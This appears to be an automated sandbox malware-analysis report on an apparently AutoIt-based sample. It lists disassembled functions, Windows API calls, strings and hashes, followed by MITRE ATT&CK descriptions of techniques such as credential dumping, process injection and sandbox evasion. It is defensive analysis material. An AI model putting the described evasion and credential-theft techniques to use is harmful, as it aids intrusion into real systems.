Instruction ID: 04e142739af7a517c72fd9b5a643e15817d5d0b0fbc16fda53c38c09efd69a66
Opcode Fuzzy Hash: 1634ff44a925b87e20362cb41550769e171235ead0e82151bbded82bb03b1365
Instruction Fuzzy Hash: 5611A071215731BAD7384B668CC9FE7BEA8EF127A4F00433AF119830C0E6609A55D6F0

Function 00C23429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00C234AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C234BA

Strings

edit, xrefs: 00C2348F

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: f071982b5bae7ffa6f36ff98f851c913bc8622ddf25ab5a791b432cc92e827be
Instruction ID: 56ca97956b7a9eadcc2f6b2996c8ed04438f56e31601270c23a11646f48249b1
Opcode Fuzzy Hash: f071982b5bae7ffa6f36ff98f851c913bc8622ddf25ab5a791b432cc92e827be
Instruction Fuzzy Hash: 9D11BF71100168ABEB22AE64EC84BAB3B6AEB05374F504364FA70939D0C779DE519B60

Function 00BF6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00B99CB3: _wcslen.LIBCMT ref: 00B99CBD

CharUpperBuffW.USER32(?,?,?), ref: 00BF6CB6
_wcslen.LIBCMT ref: 00BF6CC2

Strings

STOP, xrefs: 00BF6CBC, 00BF6CC1

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 0d2093e43ba8db891f0db5cb09a76b26210698560454bc9162ff441848bad264
Instruction ID: c9499928a11322e2d635f27e474624c50f62a5a378ed6bb871ecf2fe7418b1d5
Opcode Fuzzy Hash: 0d2093e43ba8db891f0db5cb09a76b26210698560454bc9162ff441848bad264
Instruction Fuzzy Hash: AA01C032A1052E9BCB20AFFDDC809BF77F5EB6171071005B8EEA297195EB31D948C650

Function 00BF1CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B99CB3: _wcslen.LIBCMT ref: 00B99CBD

Part of subcall function 00BF3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00BF3CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00BF1D4C

Strings

ComboBox, xrefs: 00BF1CEB
ListBox, xrefs: 00BF1D16

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 69f0256628c17f5f270dc6b01496ce4ac82d696f8b338d36d9d880e7a2ef1a64
Instruction ID: 2dfddc53e1bb51c5941ba75fc556bd721d4dfe4e1f8a09400e8c0811d3aea4ee
Opcode Fuzzy Hash: 69f0256628c17f5f270dc6b01496ce4ac82d696f8b338d36d9d880e7a2ef1a64
Instruction Fuzzy Hash: 0B01B579601218EB8F14EBA8CC559FE73F8EB46350B040DAEF932672D1EA31590C8660

Function 00BF1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B99CB3: _wcslen.LIBCMT ref: 00B99CBD

Part of subcall function 00BF3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00BF3CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00BF1C46

Strings

ComboBox, xrefs: 00BF1BE5
ListBox, xrefs: 00BF1C10

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 78a72a597d7df750c4921a704c0020bcb3dd4e94a7b3ebb0bcf7745201296e1b
Instruction ID: 7e59dc17675602b2d6b1f99f13bb401ffccc3689e84b30571fbc6aba0dae0c8a
Opcode Fuzzy Hash: 78a72a597d7df750c4921a704c0020bcb3dd4e94a7b3ebb0bcf7745201296e1b
Instruction Fuzzy Hash: 9201A77568110CA7CF14EBA8CDA5AFF77E8DB11340F1408ADFA1677281EA209E0CC6B5

Function 00BF1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B99CB3: _wcslen.LIBCMT ref: 00B99CBD

Part of subcall function 00BF3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00BF3CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00BF1CC8

Strings

ComboBox, xrefs: 00BF1C69
ListBox, xrefs: 00BF1C94

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: d8da2ea676e5c28fa5c54135cd17b2adbee751b643d46bfb1d9cf28d9efa0a99
Instruction ID: e4e860d0983ea4c10384477770542fcd55d6e519de0a66c8f77827c541215fd2
Opcode Fuzzy Hash: d8da2ea676e5c28fa5c54135cd17b2adbee751b643d46bfb1d9cf28d9efa0a99
Instruction Fuzzy Hash: 1601D675A8021CA7CF14EBA9CE51AFE77E8DB11380F1408A9F91277281EA219F0CC671

Function 00BF1D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B99CB3: _wcslen.LIBCMT ref: 00B99CBD

Part of subcall function 00BF3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00BF3CCA

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00BF1DD3

Strings

ComboBox, xrefs: 00BF1D75
ListBox, xrefs: 00BF1DA0

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 53350048a570c29de491937ee2fcec443018f84039d3baf8e919deaf7299d4e1
Instruction ID: 80ac9e43064924393e39c5db345fb2ab46e8403ba6a0417ac077aea9f0e4713f
Opcode Fuzzy Hash: 53350048a570c29de491937ee2fcec443018f84039d3baf8e919deaf7299d4e1
Instruction Fuzzy Hash: 5DF0A975A51218A7DF14E7A9CC95BFE77F8EB01750F040D79F922632C1DA60590C8264

Function 00C1747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C17493
_wcslen.LIBCMT ref: 00C174B9

Strings

3, 3, 16, 1, xrefs: 00C17483

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 1375b39b22bdec248a1c4b957e36e3343c2dbcd0adc872878baa784d47491807
Instruction ID: cab303f2035e217cd962494cbd8f998e50cf2444d8e3b93aa6945b80ba5e8337
Opcode Fuzzy Hash: 1375b39b22bdec248a1c4b957e36e3343c2dbcd0adc872878baa784d47491807
Instruction Fuzzy Hash: 6CE02B062042201593311279ACC19FF56D9DFCA7A0714192BF9C1C2267EBD4CED1A3A0

Function 00BF0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00BF0B23

Strings

AutoIt, xrefs: 00BF0B17
Error allocating memory., xrefs: 00BF0B1C

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 0a32a1fc0e96c113298785cab9539a62bcd0c46621584a1eb72fca1052787bed
Instruction ID: 4d6d70bcbdcd8250cab4dc47c07fedfaaf40a9ef8921f9a5d7b495cc3b287f29
Opcode Fuzzy Hash: 0a32a1fc0e96c113298785cab9539a62bcd0c46621584a1eb72fca1052787bed
Instruction Fuzzy Hash: AEE0D83124831826D22436947C43FDD7BC49F05F61F1004B6FB98558D38AE1649006EE

Function 00BB0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00BAF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00BB0D71,?,?,?,00B9100A), ref: 00BAF7CE

IsDebuggerPresent.KERNEL32(?,?,?,00B9100A), ref: 00BB0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B9100A), ref: 00BB0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00BB0D7F

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 6dfaa1e5bcd4f2d4ce912f5979158ef7877fdc641848f9b1c964d8fee9d78d28
Instruction ID: f813a1e12caf5e04cfa49a8f53a30bc69f30864ead289743b41c7e47e483a219
Opcode Fuzzy Hash: 6dfaa1e5bcd4f2d4ce912f5979158ef7877fdc641848f9b1c964d8fee9d78d28
Instruction Fuzzy Hash: 82E06DB02103118BD731AFBDE4483AA7BF0AF00740F0489BDE882C6AA1DBF4E4458B91

Function 00BED21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00BED220

Strings

%.3d, xrefs: 00BED22B
X64, xrefs: 00BED2A8

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: e2f0fd0c66f8c4c93fd4534dafd90ae8b1ddedc613a544d9db4658556fc0dd00
Instruction ID: 5e048cfea8ebc7b5b4ef3dad613fc5c12fe48cec8db01fcb1ac93ed61fe7156c
Opcode Fuzzy Hash: e2f0fd0c66f8c4c93fd4534dafd90ae8b1ddedc613a544d9db4658556fc0dd00
Instruction Fuzzy Hash: 88D01261808149E9CB5097E1DCC59BDB3FCAB09341F5084E2FA16A1050D764C5496B61

Function 00C22356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C2236C
PostMessageW.USER32(00000000), ref: 00C22373

Part of subcall function 00BFE97B: Sleep.KERNEL32 ref: 00BFE9F3

Strings

Shell_TrayWnd, xrefs: 00C22365

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 6f701eb6cf2ea569ade8376a01ab9a21000bf174dfaab981c4e209fd98a0667f
Instruction ID: 4117a9a3b70484d2f0e5413ab31277d1b8a433de02fd0876abdbbd589b0e3019
Opcode Fuzzy Hash: 6f701eb6cf2ea569ade8376a01ab9a21000bf174dfaab981c4e209fd98a0667f
Instruction Fuzzy Hash: B9D0A932390300BAE274A7309C4FFCE66049B04B00F404A22B701AB0E0C8F0A8468A18

Function 00C22322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C2232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C2233F

Part of subcall function 00BFE97B: Sleep.KERNEL32 ref: 00BFE9F3

Strings

Shell_TrayWnd, xrefs: 00C22325

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 6a4175071132f1e55c7af80b9a394f460c97026c0e1493000545d6b95df69d89
Instruction ID: c17b67f9324a31c3b68c5b32287e7a1b9a65b61e5bc44fae4f0576ae09cc5984
Opcode Fuzzy Hash: 6a4175071132f1e55c7af80b9a394f460c97026c0e1493000545d6b95df69d89
Instruction Fuzzy Hash: C9D022363A4300B7E274B730DC4FFDE7A049B00B00F004A22B705AB0E0C8F0E846CA14

Function 00BCBDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00BCBE93
GetLastError.KERNEL32 ref: 00BCBEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BCBEFC

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 87b7f035214cbd65d79b4eed41a9d97658311e100f62d1efe69b96098876017b
Instruction ID: 0d878cc2ab85293b481917ac5ff10d92b313b2a0def41edb3acda32fe28610fc
Opcode Fuzzy Hash: 87b7f035214cbd65d79b4eed41a9d97658311e100f62d1efe69b96098876017b
Instruction Fuzzy Hash: 0C41AE35600216ABDF218FA4CC86FBE7BE5EF41720F1441ADF9599B2A1DB308D05CB61

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

